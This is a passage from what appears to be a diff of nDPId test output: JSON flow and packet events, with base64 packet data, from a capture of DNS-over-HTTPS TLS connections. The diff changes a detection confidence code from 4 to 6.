vXuKrcPIZlkW8iZdSPWqT0Pls1rgFcXIxjJuZzAKdz9RIDjZGrpzpHXAzwarf0m0i2Gtw3bYKFHdkTT5n1uaYQthMuQHJHi+p8XDFtekQax3jKJD3CiZg+YeLzJ5Uo0iEidZKe5rH7ZzgkT8O0rVZwq5niGJgbiV3EUpPldHNKypyvkj3ycT9kY2IJU7ZpXJRnpDRxjhVDO4G\/kK6jqgKdwB9YrN8ddL2ErNeFlxtrqM8tHt2ZYdSMZYCnp2omvPy97RCe3Cp\/HGnLxpRs+DW569z8h8BSfI\/zMEZeQ4RsdRgF8hz+rQ8SRDGvtaqUblOPSNlurg9vSpcyYw7DcuCxkCASBOvLXbWh8As7fT8An8+JscVf\/lq\/mGQvDlSuFNj+tDMXoI0ZKapFzG\/KPdLhwKgFCipECC9Er6NeMVnAw07Z3oto50ydjbh57kzukh0zqDBLZjEhtFpoAiVBqZg7B50ytdFgK+6hZgsHjVoNuFRf32MJngr13fBBtHKo\/VHaVg4drs9W9DfAL1w5rtOMVsX6aUt1YAeiwdGBNEPyNmvNCcEQOj+xzMfVoOLm7SUXFyIm1n+reDHyXo8yNG7LkDYjmq\/JLkrpjl4bFeLBsdG760CBaEUCZJd3nvhfPPBsfCBF5PswuYpAEifKeZ17NlOaSrxj79WssKYt4uUKm2gm9JHcvNneM5n7DQEooPTVEVYNOgvXrRVlbfz+Cy2kBP2gCp+jUrcKx4YKGEhDuMaL8PfHGRT2vA7nqzUU9C3cJ3emOjaD7KMjipJvPBaA7U+L8ujhu2gJWLx4yY7mn3RV6K2HsrFjTJduvDGB+DqQg96t2CJjvMbpqIitN9hBxZbznMh3XU1HogwVfIbOe8Ug8cikY7ag9rW6E1CfeBwa9CM8u9CTXlTgumW220WzI\/+S8CMvOup0C9PugMt2Jc4cXDvNs+dyRWH3X7QIImonFrQ6RaFIHlbDa5gqN+0VC87hnjQE8OUpxOAg1ReSXhcDAwEZLWp\/o3fXWPvp18ZXCuvlFC4i5H\/0jL\/Tq956IZziJu\/XhSjlSr056BPu7zKCegDZWzYsK6oLPWAfcvtcSfAPACHpLE+JYCNMevr7LjdkYBxYeJsjktZDgoEi7lSxc1XaPOcOHuKcNBIZPhHzY\/jpu14RecKRjxP8M4PlZTTXUvzf286xa1A7FPGcV7e6"} -00950{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":455,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":28,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":946739400581,"flow_last_seen":946739400612,"flow_idle_time":7580000,"flow_min_l4_payload_len":287,"flow_max_l4_payload_len":2904,"flow_tot_l4_payload_len":3191,"flow_avg_l4_payload_len":1595,"midstream":1,"thread_ts_msec":946739400612,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"193.70.85.11","src_port":54164,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.DoH_DoT","breed":"Fun","category":"Network"},"tls": {"version":"TLSv1.3","client_requested_server_name":"doh.bortzmeyer.fr","ja3":"d0ee3237a14bbd89ca4d2b5356ab20ba","ja3s":"15af977ce25de452b96affa2addb1036","unsafe_cipher":0,"cipher":"TLS_AES_256_GCM_SHA384","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} +00950{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":455,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":28,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":946739400581,"flow_last_seen":946739400612,"flow_idle_time":7580000,"flow_min_l4_payload_len":287,"flow_max_l4_payload_len":2904,"flow_tot_l4_payload_len":3191,"flow_avg_l4_payload_len":1595,"midstream":1,"thread_ts_msec":946739400612,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"193.70.85.11","src_port":54164,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.DoH_DoT","breed":"Fun","category":"Network"},"tls": {"version":"TLSv1.3","client_requested_server_name":"doh.bortzmeyer.fr","ja3":"d0ee3237a14bbd89ca4d2b5356ab20ba","ja3s":"15af977ce25de452b96affa2addb1036","unsafe_cipher":0,"cipher":"TLS_AES_256_GCM_SHA384","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} 00753{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":456,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":28,"flow_packet_id":3,"flow_last_seen":946739400612,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":268,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":268,"pkt_l4_len":234,"thread_ts_msec":946739400612,"pkt":"ZmZmZmZmRERERERECABFAAD+44BAADQGi2vBRlULCgAAAQG705Siz6CRpzc6clAYAfVAMQAA7MoGonW0Fj4lHArVaOCgJtbHn9aRY0n9LKnu3cTyqbChLhfccHsdC81z2fZ+Ukv\/nAuBoKACJX8Pwem5JBIGeQ+hR9gvbJqO0dljTEjfnQJGlcWyJk4FqoFjayNoVLdbRg\/yWeK8VeLtflQjLxqwMpDM\/QbduG5HAuBrFrE4C7dTGq1PezTGhU9pqGsXAwMARb1ScBcpf\/m81VPRA3LW\/2mv0IZmicbA7T0x5byJ5bKDeMQneniKc1y1kH9Jz7ueZz9IjjqOqk3CW8r0ZREMc3BCfYPYBQ=="} 00588{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":469,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":29,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739400702,"flow_last_seen":946739400702,"flow_idle_time":7580000,"flow_min_l4_payload_len":288,"flow_max_l4_payload_len":288,"flow_tot_l4_payload_len":288,"flow_avg_l4_payload_len":288,"midstream":1,"thread_ts_msec":946739400702,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"209.250.241.25","src_port":35714,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00848{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":469,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":29,"flow_packet_id":1,"flow_last_seen":946739400702,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":342,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":342,"pkt_l4_len":308,"thread_ts_msec":946739400702,"pkt":"REREREREZmZmZmZmCABFAAFILINAAH4GS1wKAAAB0frxGYuCAbtSRrNTwAekRVAYAfaFCwAAFgMBARsBAAEXAwMzpeRPPpmPOBWwlYuEr5uNgoasUYbxY5rOmYFKCjGtJyAIAEydch7b9cupGuDzo92xh9NLKrnQMxUlfE7nWZM5\/gAmwC\/AMMArwCzMqMypwBPACcAUwAoAnACdAC8ANcASAAoTARMDEwIBAACoAAAAFwAVAAASamFyamFyLm1lZ2FuZXJkLm5sAAUABQEAAAAAAAoACgAIAB0AFwAYABkACwACAQAADQAaABgIBAQDCAcIBQgGBAEFAQYBBQMGAwIBAgP\/AQABAAAQAA4ADAJoMghodHRwLzEuMQASAAAAKwAJCAMEAwMDAgMBADMAJgAkAB0AIJeuQLdGEJN7n7Os\/LoZLYTlp1p11dddxIYAQZdOassB"} -00911{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":469,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":29,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739400702,"flow_last_seen":946739400702,"flow_idle_time":7580000,"flow_min_l4_payload_len":288,"flow_max_l4_payload_len":288,"flow_tot_l4_payload_len":288,"flow_avg_l4_payload_len":288,"midstream":1,"thread_ts_msec":946739400702,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"209.250.241.25","src_port":35714,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.DoH_DoT","breed":"Fun","category":"Network"},"tls": {"version":"TLSv1.2","client_requested_server_name":"jarjar.meganerd.nl","ja3":"d0ee3237a14bbd89ca4d2b5356ab20ba","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} +00911{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":469,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":29,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739400702,"flow_last_seen":946739400702,"flow_idle_time":7580000,"flow_min_l4_payload_len":288,"flow_max_l4_payload_len":288,"flow_tot_l4_payload_len":288,"flow_avg_l4_payload_len":288,"midstream":1,"thread_ts_msec":946739400702,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"209.250.241.25","src_port":35714,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.DoH_DoT","breed":"Fun","category":"Network"},"tls": {"version":"TLSv1.2","client_requested_server_name":"jarjar.meganerd.nl","ja3":"d0ee3237a14bbd89ca4d2b5356ab20ba","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} 03224{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":470,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":29,"flow_packet_id":2,"flow_last_seen":946739400727,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":2102,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":2102,"pkt_l4_len":2068,"thread_ts_msec":946739400727,"pkt":"ZmZmZmZmRERERERECABFAAgouN1AADcG\/yHR+vEZCgAAAQG7i4LAB6RFUka0c1AYAfWL6wAAFgMDAGYCAABiAwNagb8+u4y1yd1xwzS1nH\/nTUIdC4eY2A55MtUayrM8fyDO5yrWZS4Aa1iS7gSLPLT\/C8LAuC029TJv1sr4CTESSMAwAAAa\/wEAAQAACwAEAwABAgAFAAAAEAAFAAMCaDIWAwMKAwsACf8ACfwABWAwggVcMIIERKADAgECAhIDDKJHTnwjwsnrm2DLrI1zNLUwDQYJKoZIhvcNAQELBQAwSjELMAkGA1UEBhMCVVMxFjAUBgNVBAoTDUxldCdzIEVuY3J5cHQxIzAhBgNVBAMTGkxldCdzIEVuY3J5cHQgQXV0aG9yaXR5IFgzMB4XDTIwMDcxNDIzNDcyMVoXDTIwMTAxMjIzNDcyMVowHTEbMBkGA1UEAxMSamFyamFyLm1lZ2FuZXJkLm5sMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAv9OPyuZ6JwIE6bPDfiRhbYPMkVlSRq93tijiXoOFC9OQc4eXtoMomU6kKPy5Z0NTzEB3WAHxrA4SRx6q3\/yefPeWA8HsMuYfQZpftg95obbyxbYYejVTJGcDt7bBAbyfyHwpa9VQXCZ1NM6170XCwqiTXQ5pCT67h001VbP663EnKohkf0MUwppbn6Q5xEFc+o+3D6IU\/rxkzW1SQTh0phbzb1Op8DfM63A\/ZtxaA5UoEOBp23CMkB\/vP5ul2uJharTqU\/BfvvV3HB\/zu9o43hkbooUEyMuBJn0+O6orVhwG1QVKM6xj5TM6ZcijU2+3rS+x7vNJUt\/bTHh7sHDviQIDAQABo4ICZzCCAmMwDgYDVR0PAQH\/BAQDAgWgMB0GA1UdJQQWMBQGCCsGAQUFBwMBBggrBgEFBQcDAjAMBgNVHRMBAf8EAjAAMB0GA1UdDgQWBBRLbCV+QerkMWgquQ7dzQvZqcefiTAfBgNVHSMEGDAWgBSoSmpjBH3duubRObemRWXv86jsoTBvBggrBgEFBQcBAQRjMGEwLgYIKwYBBQUHMAGGImh0dHA6Ly9vY3NwLmludC14My5sZXRzZW5jcnlwdC5vcmcwLwYIKwYBBQUHMAKGI2h0dHA6Ly9jZXJ0LmludC14My5sZXRzZW5jcnlwdC5vcmcvMB0GA1UdEQQWMBSCEmphcmphci5tZWdhbmVyZC5ubDBMBgNVHSAERTBDMAgGBmeBDAECATA3BgsrBgEEAYLfEwEBATAoMCYGCCsGAQUFBwIBFhpodHRwOi8vY3BzLmxldHNlbmNyeXB0Lm9yZzCCAQQGCisGAQQB1nkCBAIEgfUEgfIA8AB3AF6nc\/nfVsDntTZIfdBJ4DJ6kZoMhKESEoQYdZaBcUVYAAABc0\/ws2wAAAQDAEgwRgIhAMWgM8fCSKocSMS6vNmRTIKDzMWXKgtHRh\/4TftRR0QHAiEA3JSerrntM9u7waurWrvwybuL6dB9RsJnzjR8MMY9tuIAdQAHt1wb5X1o\/\/Gwxh0jFce65ld8V5S3au68YToaadOiHAAAAXNP8LOOAAAEAwBGMEQCIG6J2T+qpPVVFxjS27cFglwKmn3u\/zi2QCL4kFgVvwefAiAZm3eKKyeMogTwUuYzbx+RsfIEqA9nNOdkRRv\/z1FxuzANBgkqhkiG9w0BAQsFAAOCAQEAcAija84yR1ADOoiyrdQFCgxJZB2BUUNBtRgi8ZPFZIdUaVPomyGL3oK59c6IO+gMw6xbSeGsLaVjettLRMJ2uMl6JZkgjV1Bhp3NdPQKieFpoaEiEBUAwqL8TSBKdJ\/mAMQLAKadqZ1hZKcVTPtXVdd5Q28iLasE\/NjtopLZOa1XOJt0sUbRAHa2FOZzb42ureqnIdzzYgm+hY18KJUkfrSxCg2dd4MTgQuYu+ZhUpaMB2rAm94XcTgVTGO5ADi5NM0oEFFNdNKrAyCom1jWC2m8LyYfCzUJEAYCAUd1WL438vW1Z0FQZK5dAca9qTf6FxrRdYRYrY7oGND3IwvyWwAEljCCBJIwggN6oAMCAQICEAoBQUIAAAFThXNqC4XspwgwDQYJKoZIhvcNAQELBQAwPzEkMCIGA1UEChMbRGlnaXRhbCBTaWduYXR1cmUgVHJ1c3QgQ28uMRcwFQYDVQQDEw5EU1QgUm9vdCBDQSBYMzAeFw0xNjAzMTcxNjQwNDZaFw0yMTAzMTcxNjQwNDZaMEoxCzAJBgNVBAYTAlVTMRYwFAYDVQQKEw1MZXQncyBFbmNyeXB0MSMwIQYDVQQDExpMZXQncyBFbmNyeXB0IEF1dGhvcml0eSBYMzCCASIwDQYJKoZIhvcNAQEBBQADggEPADCCAQoCggEBAJzTDPBa5S5Ht3JdN4OzaGMw6tc1Jhkl4b2+NfFwki+3uEtBBaupnjUIWOyxKsRohwuj43Xk5vOnYnG6eYFgH9eRmp\/z0HhncchpDpWRz\/7mmelgPEjMfspNdxIknUcbWuu57B43ABycrHunBerOSuu9QeU2mLnL\/W08lmjfIypCkAyGdGfIf6WauFJhFBM\/ZemCh8vb+g5W9oaJ84U\/l4avsNwa72sNlRZ9xCugZbKZBDZ1gGusSvMbkEl4L6KWTyogJSkExnTA0DHNjzE4lRa6qDO4Q\/GxH8Mwf6J5MRM9LTb44\/zyM2q5OTHFr8SNDR1kFjOq+oQpttQLwNh9w5MCAwEAAaOCAX0wggF5MBIGA1UdEwEB\/wQIMAYBAf8CAQAwDgYDVR0="} -00968{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":470,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":29,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":946739400702,"flow_last_seen":946739400727,"flow_idle_time":7580000,"flow_min_l4_payload_len":288,"flow_max_l4_payload_len":2048,"flow_tot_l4_payload_len":2336,"flow_avg_l4_payload_len":1168,"midstream":1,"thread_ts_msec":946739400727,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"209.250.241.25","src_port":35714,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.DoH_DoT","breed":"Fun","category":"Network"},"tls": {"version":"TLSv1.2","client_requested_server_name":"jarjar.meganerd.nl","ja3":"d0ee3237a14bbd89ca4d2b5356ab20ba","ja3s":"2464432ec440b95b36263230c3148d11","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_256_GCM_SHA384","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} +00968{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":470,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":29,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":946739400702,"flow_last_seen":946739400727,"flow_idle_time":7580000,"flow_min_l4_payload_len":288,"flow_max_l4_payload_len":2048,"flow_tot_l4_payload_len":2336,"flow_avg_l4_payload_len":1168,"midstream":1,"thread_ts_msec":946739400727,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"209.250.241.25","src_port":35714,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.DoH_DoT","breed":"Fun","category":"Network"},"tls": {"version":"TLSv1.2","client_requested_server_name":"jarjar.meganerd.nl","ja3":"d0ee3237a14bbd89ca4d2b5356ab20ba","ja3s":"2464432ec440b95b36263230c3148d11","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_256_GCM_SHA384","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} 02460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":471,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":29,"flow_packet_id":3,"flow_last_seen":946739400727,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":1535,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1535,"pkt_l4_len":1501,"thread_ts_msec":946739400727,"pkt":"ZmZmZmZmRERERERECABFAAXxuN9AADcGAVfR+vEZCgAAAQG7i4LAB6xFUka0c1AYAfWJtAAADwEB\/wQEAwIBhjB\/BggrBgEFBQcBAQRzMHEwMgYIKwYBBQUHMAGGJmh0dHA6Ly9pc3JnLnRydXN0aWQub2NzcC5pZGVudHJ1c3QuY29tMDsGCCsGAQUFBzAChi9odHRwOi8vYXBwcy5pZGVudHJ1c3QuY29tL3Jvb3RzL2RzdHJvb3RjYXgzLnA3YzAfBgNVHSMEGDAWgBTEp7Gkeyxx+tvhS5B1\/8QVYIWJEDBUBgNVHSAETTBLMAgGBmeBDAECATA\/BgsrBgEEAYLfEwEBATAwMC4GCCsGAQUFBwIBFiJodHRwOi8vY3BzLnJvb3QteDEubGV0c2VuY3J5cHQub3JnMDwGA1UdHwQ1MDMwMaAvoC2GK2h0dHA6Ly9jcmwuaWRlbnRydXN0LmNvbS9EU1RST09UQ0FYM0NSTC5jcmwwHQYDVR0OBBYEFKhKamMEfd265tE5t6ZFZe\/zqOyhMA0GCSqGSIb3DQEBCwUAA4IBAQDdM9cR82NYON0YFfsJVb52VrlwSKVpRyd7wiQIkvFaH0oSKTckdFEcYmi4zZVwZ+X3pLxOKFHNm+iuh53q2LpaoQGa3PDdah1q2D5XI56mHgRimv\/XBcq3Hz\/ACki8lLC2ZWLgwVTloyqtIMTp5rvcyPa1wzKjmMx3qOZ5ZQcryyj+OhZSgc5SDC5fg+jVBjP7d2zOQOoynh+SXEHBdGxbXQpfM8xNn6w48C97LGKd2aORbyUbL5CxGUY99n4bpnqHuaN6bRj6JaWRhxXg8hYvWLAGLyxoJsZLmM3anwz5f5DtQ0oSRE5vc3oo6qSqbntMfYfd4MkCRKeHr8M0W7RCFgMDAhcWAAITAQACDzCCAgsKAQCgggIEMIICAAYJKwYBBQUHMAEBBIIB8TCCAe0wgdahTDBKMQswCQYDVQQGEwJVUzEWMBQGA1UEChMNTGV0J3MgRW5jcnlwdDEjMCEGA1UEAxMaTGV0J3MgRW5jcnlwdCBBdXRob3JpdHkgWDMYDzIwMjAwOTA0MDA0OTAwWjB1MHMwSzAJBgUrDgMCGgUABBR+5mrncpqz\/PiiIGRsFqEtYHEIXQQUqEpqYwR93brm0Tm3pkVl7\/Oo7KECEgMMokdOfCPCyeubYMusjXM0tYAAGA8yMDIwMDkwNDAwMDAwMFqgERgPMjAyMDA5MTEwMDAwMDBaMA0GCSqGSIb3DQEBCwUAA4IBAQAoMB1ePZKC8NpTy2434kCI6h8NAXGSDejnRZYFr2QSx+TpoZipUWbMWCq8UzrMIxKC8UJACJQc6RIM+Xgz0ZRbGx25OD3V4vLxsczn\/nEIsXCHGvGoEBJqPqesQfpmU9r+oB2CbUgxGaJxDFqnidG6tH5KNxFVbrX2lPzXeDzKwLN1eUiZU\/lMuAOJwkK8zmwVXP5H7g6aco+MiZp06K8b\/Da3w0YGUY9fjEablMtV5ViuxARhZw1pWYWZo\/jGfvICDNvPKmx8V1X1Z4R8rNjm8UiPRR8P0NarasVvNtWs+6fXGpl\/hFMZzj6z4oAVh0vYNXKYxmaDs8l6pH8OOZ\/cFgMDASwMAAEoAwAdIBuLZjnTB3Kjce7+mNxfaBiRgPo4iNkyTjzm6+fh98MBCAQBAAD35z4OurpaleuYyQXrRwgunZx5itw99f\/qns7fqVRPpCakkPBqYtIkrAQds7t3x9gcyB3pN\/ek7QU4lXsRRnsrWpFsVpkkgouj8noQcYPmvp55cuzOEjLxYK5KOB1bU10ZmdANW3hMqgjTathZk6jfjNOD8MgF15uckgPUXOITOpG7UYd\/YtxRx7xgMGY0jlH\/+xeUF+NSAiy6s9oSi0oU\/QlatPOidPhVmRC84vWQNkgJhZubcKWseKLjiRRL9zUmMJ2fjig0R0EKUVh0pAUSNWsA0m3x1YIPV6kX\/fzGNkCBx4kijVkxENgEgAD9si+WguAjMtSH5qQYN0CMxwsWAwMABA4AAAA="} -01301{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":471,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":29,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":946739400702,"flow_last_seen":946739400727,"flow_idle_time":7580000,"flow_min_l4_payload_len":288,"flow_max_l4_payload_len":2048,"flow_tot_l4_payload_len":3817,"flow_avg_l4_payload_len":1272,"midstream":1,"thread_ts_msec":946739400727,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"209.250.241.25","src_port":35714,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"9": {"risk":"TLS Cert Expired","severity":"High","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"TLS.DoH_DoT","breed":"Fun","category":"Network"},"tls": {"version":"TLSv1.2","client_requested_server_name":"jarjar.meganerd.nl","server_names":"jarjar.meganerd.nl","ja3":"d0ee3237a14bbd89ca4d2b5356ab20ba","ja3s":"2464432ec440b95b36263230c3148d11","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_256_GCM_SHA384","issuerDN":"C=US, O=Let's Encrypt, CN=Let's Encrypt Authority X3","subjectDN":"CN=jarjar.meganerd.nl","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1","fingerprint":"17:C9:8C:F5:DD:1F:0E:0F:DC:C5:42:4F:ED:C4:CD:57:5A:5D:7A:4F"}} +01301{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":471,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":29,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":946739400702,"flow_last_seen":946739400727,"flow_idle_time":7580000,"flow_min_l4_payload_len":288,"flow_max_l4_payload_len":2048,"flow_tot_l4_payload_len":3817,"flow_avg_l4_payload_len":1272,"midstream":1,"thread_ts_msec":946739400727,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"209.250.241.25","src_port":35714,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"9": {"risk":"TLS Cert Expired","severity":"High","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"6":"DPI"},"proto":"TLS.DoH_DoT","breed":"Fun","category":"Network"},"tls": {"version":"TLSv1.2","client_requested_server_name":"jarjar.meganerd.nl","server_names":"jarjar.meganerd.nl","ja3":"d0ee3237a14bbd89ca4d2b5356ab20ba","ja3s":"2464432ec440b95b36263230c3148d11","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_256_GCM_SHA384","issuerDN":"C=US, O=Let's Encrypt, CN=Let's Encrypt Authority X3","subjectDN":"CN=jarjar.meganerd.nl","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1","fingerprint":"17:C9:8C:F5:DD:1F:0E:0F:DC:C5:42:4F:ED:C4:CD:57:5A:5D:7A:4F"}} 00588{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":486,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":30,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739401864,"flow_last_seen":946739401864,"flow_idle_time":7580000,"flow_min_l4_payload_len":292,"flow_max_l4_payload_len":292,"flow_tot_l4_payload_len":292,"flow_avg_l4_payload_len":292,"midstream":1,"thread_ts_msec":946739401864,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"95.216.229.153","src_port":43888,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00855{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":486,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":30,"flow_packet_id":1,"flow_last_seen":946739401864,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":346,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":346,"pkt_l4_len":312,"thread_ts_msec":946739401864,"pkt":"REREREREZmZmZmZmCABFAAFMN1VAAH4GvigKAAABX9jlmatwAbtGU6iimu8Jz1AYAfYHbQAAFgMBAR8BAAEbAwOH23fm3DrJaQXLovxzyYyk5R\/PesPVPPqPMsnNPw9NhCA+BKUjIeM9NnmcNXI7jO56RaAWoMnCcXIJRfPvBK89HQAmwC\/AMMArwCzMqMypwBPACcAUwAoAnACdAC8ANcASAAoTARMDEwIBAACsAAAAGwAZAAAWZmkuZG9oLmRucy5zbm9weXRhLm9yZwAFAAUBAAAAAAAKAAoACAAdABcAGAAZAAsAAgEAAA0AGgAYCAQEAwgHCAUIBgQBBQEGAQUDBgMCAQID\/wEAAQAAEAAOAAwCaDIIaHR0cC8xLjEAEgAAACsACQgDBAMDAwIDAQAzACYAJAAdACAgB93oNekrupxQPrzRHifFos9GGTUaOGYLuLqXCSqLFg=="} -00915{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":486,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":30,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739401864,"flow_last_seen":946739401864,"flow_idle_time":7580000,"flow_min_l4_payload_len":292,"flow_max_l4_payload_len":292,"flow_tot_l4_payload_len":292,"flow_avg_l4_payload_len":292,"midstream":1,"thread_ts_msec":946739401864,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"95.216.229.153","src_port":43888,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.DoH_DoT","breed":"Fun","category":"Network"},"tls": {"version":"TLSv1.2","client_requested_server_name":"fi.doh.dns.snopyta.org","ja3":"d0ee3237a14bbd89ca4d2b5356ab20ba","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} +00915{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":486,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":30,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739401864,"flow_last_seen":946739401864,"flow_idle_time":7580000,"flow_min_l4_payload_len":292,"flow_max_l4_payload_len":292,"flow_tot_l4_payload_len":292,"flow_avg_l4_payload_len":292,"midstream":1,"thread_ts_msec":946739401864,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"95.216.229.153","src_port":43888,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.DoH_DoT","breed":"Fun","category":"Network"},"tls": {"version":"TLSv1.2","client_requested_server_name":"fi.doh.dns.snopyta.org","ja3":"d0ee3237a14bbd89ca4d2b5356ab20ba","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} 